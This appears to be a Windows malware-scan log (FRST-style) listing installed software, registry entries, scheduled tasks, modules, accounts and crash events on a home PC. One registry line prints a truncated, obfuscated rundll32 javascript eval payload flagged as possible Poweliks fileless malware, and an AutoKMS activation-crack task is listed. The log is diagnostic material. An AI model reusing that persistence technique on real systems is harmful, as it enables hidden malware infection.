VNC Enterprise Edition E4.6.1 (HKLM\...\RealVNC_is1) (Version: E4.6.1 - RealVNC Ltd)
WordPerfect IFilter 32 bit (HKLM-x32\...\{1DF03ECE-6AF4-414E-B118-C316F151A9A2}) (Version: 1.2 - Corel Corporation)
WordPerfect IFilter 64 bit (HKLM\...\{1B45B85C-99E8-4523-8FB3-0248B3DECFC8}) (Version: 1.2 - Corel Corporation)
WordPerfect Office X6 - Common Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Common Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - IPM (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Lightning Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Lightning Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Oxford (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Presentations Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Presentations Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Quattro Pro Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Quattro Pro Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - Setup Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - System Files (x32 Version: 15.0 - Corel Corporation) Hidden
WordPerfect Office X6 - WordPerfect Files (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - WordPerfect Files English (x32 Version: 16.1 - Corel Corporation) Hidden
WordPerfect Office X6 - WT (x32 Version: 16.1 -  Corel Corporation) Hidden
WordPerfect Office X6 (HKLM-x32\...\_{26D6D2A4-F08A-4212-86E7-7F1F75033610}) (Version: 16.0.0.388 - Corel Corporation)
WordPerfect Office X6 (x32 Version: 16.0 - Corel Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-153314184-682568810-1827683989-1001_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Rod\AppData\Local\Microsoft\SkyDrive\17.0.4035.0328\amd64\FileSyncApi64.dll (Microsoft Corporation)

==================== Restore Points  =========================

24-01-2014 20:13:11 Scheduled Checkpoint
24-01-2014 20:25:10 Installed Samsung Kies3
01-02-2014 08:00:03 Scheduled Checkpoint
06-02-2014 07:26:52 Installed iTunes
06-02-2014 07:48:27 Removed iTunes
06-02-2014 16:22:12 Installed iTunes
06-02-2014 18:14:12 Removed Apple Software Update
06-02-2014 18:22:49 Removed Apple Mobile Device Support
06-02-2014 18:24:53 Removed Bonjour
06-02-2014 18:26:12 Removed Apple Mobile Device Support
06-02-2014 18:32:10 Removed Apple Application Support
06-02-2014 18:35:08 Removed Apple Mobile Device Support
15-10-2014 10:00:13 Windows Update
15-10-2014 17:49:48 Installed VMware vSphere Client 5.5.
15-10-2014 22:15:42 Windows Update

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D2C7427-7C4A-4E2D-9F51-9773EF99BCD9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-08] (Google Inc.)
Task: {64A516D5-ED53-486F-92C3-8DD020353915} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-03-09] ()
Task: {A293FC85-67C4-4E67-98D8-DE60889B9A9B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-08] (Google Inc.)
Task: {B4845119-5600-4B32-BDF2-434D7ED2174E} - System32\Tasks\Backup Data => C:\Users\Rod\Desktop\backup.bat [2014-09-15] ()
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2014-01-21 23:56 - 2013-10-23 01:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-09-11 13:16 - 2014-09-11 13:14 - 00049152 ____N () C:\Program Files\D-Link\SharePort Plus\Spnuhelper.exe
2014-05-01 12:29 - 2014-05-01 12:29 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2014-09-11 13:16 - 2014-09-11 13:14 - 00304640 ____N () C:\Program Files\D-Link\SharePort Plus\Svlscapi.dll
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-08-23 00:42 - 2012-08-23 00:42 - 00435584 _____ () C:\Program Files (x86)\Common Files\Acronis\Home\ulxmlrpcpp.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00073352 _____ () C:\Program Files (x86)\Plex\Plex Media Server\zlib.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00195720 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libidn.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00840840 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libxml2.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00051848 _____ () C:\Program Files (x86)\Plex\Plex Media Server\soci_sqlite3-vc80-3_0.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00089224 _____ () C:\Program Files (x86)\Plex\Plex Media Server\soci_core-vc80-3_0.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 02100360 _____ () C:\Program Files (x86)\Plex\Plex Media Server\opencv_core249.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 01923720 _____ () C:\Program Files (x86)\Plex\Plex Media Server\opencv_imgproc249.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 07605400 _____ () C:\Program Files (x86)\Plex\Plex Media Server\avcodec-54.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 00202392 _____ () C:\Program Files (x86)\Plex\Plex Media Server\avutil-52.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 01453720 _____ () C:\Program Files (x86)\Plex\Plex Media Server\avformat-54.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00352920 _____ () C:\Program Files (x86)\Plex\Plex Media Server\swscale-2.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00507528 _____ () C:\Program Files (x86)\Plex\Plex Media Server\tag.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 08495240 _____ () C:\Program Files (x86)\Plex\Plex Media Server\WebKit.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 00952968 _____ () C:\Program Files (x86)\Plex\Plex Media Server\CFLite.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 01291400 _____ () C:\Program Files (x86)\Plex\Plex Media Server\JavaScriptCore.dll
2014-08-01 22:13 - 2014-08-01 22:13 - 01038984 _____ () C:\Program Files (x86)\Plex\Plex Media Server\cairo.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00073352 _____ () C:\Program Files (x86)\Plex\Plex Media Server\zlib1.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2014-02-08 15:06 - 2012-01-18 17:35 - 00385024 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsConfig.dll
2014-02-08 15:06 - 2011-12-14 22:49 - 00233472 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsExtention.dll
2014-02-08 15:06 - 2003-03-26 19:46 - 00135168 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsImgIO.dll
2014-02-08 15:06 - 2010-08-24 17:56 - 00167936 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\SSsltsa.dll
2008-11-06 15:26 - 2008-11-06 15:26 - 04715848 ____R () C:\Program Files (x86)\TechSmith\Snagit 9\PDFNetC.dll
2014-06-01 02:08 - 2014-06-01 02:08 - 00035328 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext.dll
2014-05-24 09:41 - 2014-05-24 09:41 - 00091648 _____ () C:\Program Files (x86)\FileZilla FTP Client\libgcc_s_sjlj-1.dll
2014-05-24 09:41 - 2014-05-24 09:41 - 00892416 _____ () C:\Program Files (x86)\FileZilla FTP Client\libstdc++-6.dll
2012-08-23 00:32 - 2012-08-23 00:32 - 01525120 _____ () C:\Program Files (x86)\Common Files\Acronis\Home\icudt38.dll
2014-10-17 11:53 - 2014-10-17 11:53 - 00098816 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32api.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00110080 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pywintypes27.dll
2014-10-17 11:53 - 2014-10-17 11:53 - 00364544 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pythoncom27.dll
2014-10-17 11:53 - 2014-10-17 11:53 - 00045568 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_socket.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 01160704 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_ssl.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00320512 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32com.shell.shell.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00713216 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_hashlib.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 01175040 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._core_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00805888 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._gdi_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00811008 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._windows_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 01062400 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._controls_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00735232 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._misc_.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00128512 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_elementtree.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00127488 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pyexpat.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00557056 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\pysqlite2._sqlite.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00007168 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\hashobjs_ext.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00087552 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_ctypes.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00119808 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32file.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00108544 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32security.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00018432 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32event.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00038912 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32inet.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00070656 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._html2.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00167936 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32gui.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00011264 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32crypt.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00027136 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\_multiprocessing.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00686080 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\unicodedata.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00122368 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._wizard.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00010240 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\select.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00024064 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32pipe.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00025600 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32pdh.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00525640 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\windows._lib_cacheinvalidation.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00035840 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32process.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00017408 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32profile.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00022528 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\win32ts.pyd
2014-10-17 11:53 - 2014-10-17 11:53 - 00078336 _____ () C:\Users\Rod\AppData\Local\Temp\_MEI39242\wx._animate.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00045192 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_socket.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00028808 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_ssl.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00019080 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_hashlib.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00035976 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\simplejson\_speedups.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00836744 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\lxml\etree.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00062600 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libexslt.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00166024 _____ () C:\Program Files (x86)\Plex\Plex Media Server\libxslt.dll
2014-08-01 22:14 - 2014-08-01 22:14 - 00192648 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\lxml\objectify.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00016520 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\select.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00056456 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\OpenSSL\crypto.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00018056 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\OpenSSL\rand.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00044680 _____ () C:\Program Files (x86)\Plex\Plex Media Server\Exts\OpenSSL\SSL.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00083080 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\_ctypes.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00111752 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\pyexpat.pyd
2014-08-01 22:14 - 2014-08-01 22:14 - 00692360 _____ () C:\Program Files (x86)\Plex\Plex Media Server\DLLs\unicodedata.pyd
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\office14\Cultures\office.odf
2014-05-08 04:21 - 2014-05-08 04:21 - 02897280 _____ () C:\Program Files (x86)\Adobe\Acrobat 10.0\PDFMaker\Common\AdobePDFMakerX.dll
2013-02-14 16:46 - 2013-02-14 16:46 - 01044048 _____ () C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\UmOutlookAddin.dll
2012-08-23 01:12 - 2012-08-23 01:12 - 00019840 _____ () C:\Program Files (x86)\Acronis\TrueImageHome\ti_managers_proxy_stub.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-153314184-682568810-1827683989-500 - Administrator - Disabled)
Guest (S-1-5-21-153314184-682568810-1827683989-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-153314184-682568810-1827683989-1002 - Limited - Enabled)
Parna (S-1-5-21-153314184-682568810-1827683989-1005 - Administrator - Enabled) => C:\Users\Parna
Rod (S-1-5-21-153314184-682568810-1827683989-1001 - Administrator - Enabled) => C:\Users\Rod
Sonos (S-1-5-21-153314184-682568810-1827683989-1004 - Limited - Enabled)
UpdatusUser (S-1-5-21-153314184-682568810-1827683989-1003 - Limited - Enabled) => C:\Users\UpdatusUser

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/17/2014 11:55:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/17/2014 11:49:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000701e2
Faulting process id: 0x994
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:43:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000701e2
Faulting process id: 0x8b8
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:38:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000f01e2
Faulting process id: 0x908
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:33:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002101e2
Faulting process id: 0xbc4
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:27:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x000d01e2
Faulting process id: 0x98c
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:22:30 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x001b01e2
Faulting process id: 0x598
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:17:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x002001e2
Faulting process id: 0x66c
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:11:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: dllhost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc6b7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x001001e2
Faulting process id: 0x5c4
Faulting application start time: 0xdllhost.exe0
Faulting application path: dllhost.exe1
Faulting module path: dllhost.exe2
Report Id: dllhost.exe3

Error: (10/17/2014 11:07:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

System errors:
=============
Error: (10/17/2014 11:54:34 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/17/2014 11:52:25 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {1EF75F33-893B-4E8F-9655-C3D602BA4897}

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The HomeGroup Provider service depends on the Function Discovery Provider Host service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (10/17/2014 11:52:16 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Microsoft Office Sessions:
=========================
Error: (10/17/2014 11:55:05 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (10/17/2014 11:49:01 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000701e299401cfea3afb542a2eC:\Windows\syswow64\dllhost.exeunknown41f03f75-562e-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:43:42 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000701e28b801cfea3a3d80cdb4C:\Windows\syswow64\dllhost.exeunknown841ce2fc-562d-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:38:24 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000f01e290801cfea397fd8a761C:\Windows\syswow64\dllhost.exeunknownc673fd48-562c-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:33:06 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002101e2bc401cfea38c263923eC:\Windows\syswow64\dllhost.exeunknown08ffa786-562c-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:27:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005000d01e298c01cfea3804f690f0C:\Windows\syswow64\dllhost.exeunknown4b92a638-562b-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:22:30 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005001b01e259801cfea3747280d67C:\Windows\syswow64\dllhost.exeunknown8dc422ae-562a-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:17:12 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005002001e266c01cfea3689bd6d79C:\Windows\syswow64\dllhost.exeunknownd05982c1-5629-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:11:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: dllhost.exe6.1.7600.163854a5bc6b7unknown0.0.0.000000000c0000005001001e25c401cfea35cc33ec58C:\Windows\syswow64\dllhost.exeunknown12d2d97a-5629-11e4-a33a-002215fd5f7c

Error: (10/17/2014 11:07:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

==================== Memory info ===========================

Processor: Intel® Core™2 Quad CPU Q9400 @ 2.66GHz
Percentage of memory in use: 30%
Total physical RAM: 6143.05 MB
Available physical RAM: 4247.59 MB
Total Pagefile: 12284.27 MB
Available Pagefile: 9325.32 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:499.9 GB) (Free:295.17 GB) NTFS
Drive e: (Data) (Fixed) (Total:1363.01 GB) (Free:850.37 GB) NTFS
Drive l: () (Fixed) (Total:931.51 GB) (Free:134.31 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 38DF38DE)
